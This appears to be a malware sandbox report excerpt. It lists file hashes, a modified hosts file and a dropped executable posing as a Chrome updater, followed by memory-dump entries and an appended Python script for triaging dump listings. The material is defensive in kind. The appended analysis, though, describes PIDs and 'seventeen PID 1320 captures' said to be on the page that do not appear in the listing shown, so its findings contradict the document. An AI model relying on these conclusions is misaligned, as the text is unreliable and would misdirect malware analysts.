SHA256: 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895
SHA512: 48d3b4b8a95bd4a4bc1405284db373a5acdfe30de15b0641aeef359c06a359dc1344cb8bb1fb63ee35bc38e3eae3fb88eed2128d66d52e9153e1d940be54476c
-
C:\Windows\system32\drivers\etc\hosts
Filesize: 2KB
MD5: c5227366b7a688ff23b01788718251aa
SHA1: 9795262e79c832ba49c744fcd1b1794c0ffb5c6a
SHA256: 789abfd744b03d07fac02be7177c535989ea9e92b9db32fb1360cdfd083a1f48
SHA512: 8b9560fa2265f74aec7bb7b96e5a7dba789edc4166e58af9994a1ee95fa42b22a7539be804f4fcf3d5a9e657be020087a343b030fee6aaddbb67b1134810cfbe
-
\Program Files\Google\Chrome\updater.exe
Filesize: 7.1MB
MD5: 2144e985a1fb8a18636dee1b1fcf096f
SHA1: fac93e4f151a3be8d9b0b6c9d50a31ba9a3e231a
SHA256: 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895
SHA512: 48d3b4b8a95bd4a4bc1405284db373a5acdfe30de15b0641aeef359c06a359dc1344cb8bb1fb63ee35bc38e3eae3fb88eed2128d66d52e9153e1d940be54476c
-
memory/1576-73-0x0000000000000000-mapping.dmp
-
memory/1648-120-0x0000000000000000-mapping.dmp
-
memory/1652-64-0x000007FEED280000-0x000007FEEDCA3000-memory.dmpFilesize
10.1MB
-
memory/1652-67-0x0000000002634000-0x0000000002637000-memory.dmpFilesize
12KB
-
memory/1652-66-0x0000000002634000-0x0000000002637000-memory.dmpFilesize
12KB
-
memory/1652-68-0x000000000263B000-0x000000000265A000-memory.dmpFilesize
124KB
-
memory/1652-137-0x0000000000000000-mapping.dmp
-
memory/1652-62-0x0000000000000000-mapping.dmp
-
memory/1652-65-0x000007FEEC720000-0x000007FEED27D000-memory.dmpFilesize
11.4MB
-
memory/1668-139-0x0000000000000000-mapping.dmp
-
memory/1672-81-0x0000000000000000-mapping.dmp
-
memory/1676-57-0x0000000000400000-0x0000000001066000-memory.dmpFilesize
12.4MB
-
memory/1676-54-0x0000000000400000-0x0000000001066000-memory.dmpFilesize
12.4MB
-
memory/1676-55-0x0000000000400000-0x0000000001066000-memory.dmpFilesize
12.4MB
-
memory/1676-56-0x00000000773F0000-0x0000000077599000-memory.dmpFilesize
1.7MB
-
memory/1676-58-0x00000000773F0000-0x0000000077599000-memory.dmpFilesize
1.7MB
-
memory/1688-59-0x00000000000B0000-0x00000000004CE000-memory.dmpFilesize
4.1MB
-
memory/1688-61-0x000007FEFBC71000-0x000007FEFBC73000-memory.dmpFilesize
8KB
-
memory/1688-60-0x000000001B940000-0x000000001BD5E000-memory.dmpFilesize
4.1MB
-
memory/1692-135-0x0000000000000000-mapping.dmp
-
memory/1704-126-0x0000000000000000-mapping.dmp
-
memory/1720-119-0x0000000000000000-mapping.dmp
-
memory/1732-123-0x0000000000000000-mapping.dmp
-
memory/1736-75-0x0000000000000000-mapping.dmp
-
memory/1744-94-0x0000000000000000-mapping.dmp
-
memory/1752-136-0x0000000000000000-mapping.dmp
-
memory/1752-77-0x0000000000000000-mapping.dmp
-
memory/1768-125-0x0000000000000000-mapping.dmp
-
memory/1784-127-0x0000000000000000-mapping.dmp
-
memory/1804-72-0x0000000000000000-mapping.dmp
-
memory/1836-148-0x0000000000000000-mapping.dmp
-
memory/1920-86-0x0000000000000000-mapping.dmp
-
memory/1944-108-0x0000000000000000-mapping.dmp
-
memory/1944-111-0x000007FEEC270000-0x000007FEECDCD000-memory.dmpFilesize
11.4MB
-
memory/1944-113-0x0000000001264000-0x0000000001267000-memory.dmpFilesize
12KB
-
memory/1944-114-0x000000000126B000-0x000000000128A000-memory.dmpFilesize
124KB
-
memory/1944-117-0x0000000001264000-0x0000000001267000-memory.dmpFilesize
12KB
-
memory/1944-118-0x000000000126B000-0x000000000128A000-memory.dmpFilesize
124KB
-
memory/1980-116-0x0000000000000000-mapping.dmp
-
memory/1980-85-0x0000000000000000-mapping.dmp
-
memory/2012-149-0x00000000008C0000-0x00000000008C6000-memory.dmpFilesize
24KB
-
memory/2036-105-0x0000000000000000-mapping.dmp
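The dump listing above is the raw material for triage, but it is noisy: the same region in PID 1320 is captured many times, the `Filesize` label is fused onto each path, and nothing tells you which dump to open first. The script below is an added example, not part of the sandbox report, that parses the listing format (`memory/<pid>-<seq>-0x<start>[-0x<end>]-<memory|mapping>.dmp`), cross-checks each printed size against the address range (assuming the report's 1 KB = 1024 B convention), collapses repeated captures per PID, and flags regions that begin at 0x140000000. That last check is a heuristic assumption on my part, not something the report states: 0x140000000 is the default preferred image base for 64-bit PE executables, so a dump starting exactly there is usually a whole in-memory PE image and the first thing to pull into a disassembler. The sample listing inside the script is a constructed subset of the entries on this page.

```python
import re
from collections import Counter, defaultdict

# Constructed sample, copied in the raw two-line shape the sandbox report uses:
# "<dump path>Filesize" on one line, the human-readable size on the next, and a
# lone "-" bullet between entries. Mapping dumps carry no size.
SAMPLE_LISTING = """\
memory/472-128-0x0000000000000000-mapping.dmp
-
memory/880-150-0x0000000000060000-0x0000000000067000-memory.dmpFilesize
28KB
-
memory/968-95-0x0000000000400000-0x0000000001066000-memory.dmpFilesize
12.4MB
-
memory/968-104-0x00000000773F0000-0x0000000077599000-memory.dmpFilesize
1.7MB
-
memory/1320-124-0x0000000000000000-mapping.dmp
-
memory/1320-160-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/1320-168-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/1320-179-0x0000000000270000-0x0000000000290000-memory.dmpFilesize
128KB
-
"""

# memory/<pid>-<seq>-0x<start>[-0x<end>]-<memory|mapping>.dmp, optionally with the
# "Filesize" label fused onto the path by the page extraction.
ENTRY_RE = re.compile(
    r"^memory/(?P<pid>\d+)-(?P<seq>\d+)-0x(?P<start>[0-9A-Fa-f]+)"
    r"(?:-0x(?P<end>[0-9A-Fa-f]+))?-(?P<kind>memory|mapping)\.dmp"
    r"(?P<has_size>Filesize)?$"
)

# Heuristic (assumption, not from the report): default preferred image base for
# 64-bit PE executables. A region starting exactly here is usually a whole PE image.
X64_DEFAULT_IMAGE_BASE = 0x140000000


def human_size(nbytes):
    """Render a byte count the way the report prints it (1 KB = 1024 bytes)."""
    if nbytes >= 1024 * 1024:
        return f"{nbytes / (1024 * 1024):.1f}MB"
    return f"{nbytes // 1024}KB"


def parse_dump_listing(text):
    """Turn the raw listing into dicts with pid, seq, start, end, kind, size."""
    lines = [ln.strip() for ln in text.splitlines()]
    entries, i = [], 0
    while i < len(lines):
        m = ENTRY_RE.match(lines[i])
        i += 1
        if not m:
            continue  # "-" bullets and blank lines
        stated = None
        if m.group("has_size") and i < len(lines):
            stated = lines[i]  # the size sits on the following line
            i += 1
        start = int(m.group("start"), 16)
        end = int(m.group("end"), 16) if m.group("end") else None
        entries.append({
            "pid": int(m.group("pid")),
            "seq": int(m.group("seq")),
            "start": start,
            "end": end,
            "kind": m.group("kind"),
            "size": (end - start) if end is not None else 0,
            "stated_size": stated,
        })
    return entries


def size_mismatches(entries):
    """Entries whose address range disagrees with the size printed next to them."""
    return [e for e in entries
            if e["stated_size"] is not None and human_size(e["size"]) != e["stated_size"]]


def regions_by_pid(entries):
    """pid -> {(start, end): number of times that region was dumped}."""
    out = defaultdict(Counter)
    for e in entries:
        if e["kind"] == "memory":
            out[e["pid"]][(e["start"], e["end"])] += 1
    return {pid: dict(c) for pid, c in out.items()}


def image_base_dumps(entries, base=X64_DEFAULT_IMAGE_BASE):
    """Unique (pid, start, end) regions that begin at the image base of interest."""
    seen = []
    for e in entries:
        key = (e["pid"], e["start"], e["end"])
        if e["kind"] == "memory" and e["start"] == base and key not in seen:
            seen.append(key)
    return seen


if __name__ == "__main__":
    parsed = parse_dump_listing(SAMPLE_LISTING)
    for pid, regions in sorted(regions_by_pid(parsed).items()):
        for (start, end), n in sorted(regions.items()):
            print(f"pid {pid}: 0x{start:X}-0x{end:X} {human_size(end - start)} x{n}")
    print("size mismatches:", size_mismatches(parsed))
    print("image-base dumps:", image_base_dumps(parsed))
```

Run against the full listing, `regions_by_pid` reduces the seventeen PID 1320 captures to two distinct regions, and `image_base_dumps` singles out the 8.0MB region at 0x140000000 in that PID; the repeated 12.4MB region at 0x400000 in PIDs 968 and 1676 and the 1.7MB region at 0x773F0000 in the same PIDs stand out as the same image loaded twice. A non-empty result from `size_mismatches` would mean a dump's printed size and its address range disagree, which is worth noticing before trusting either.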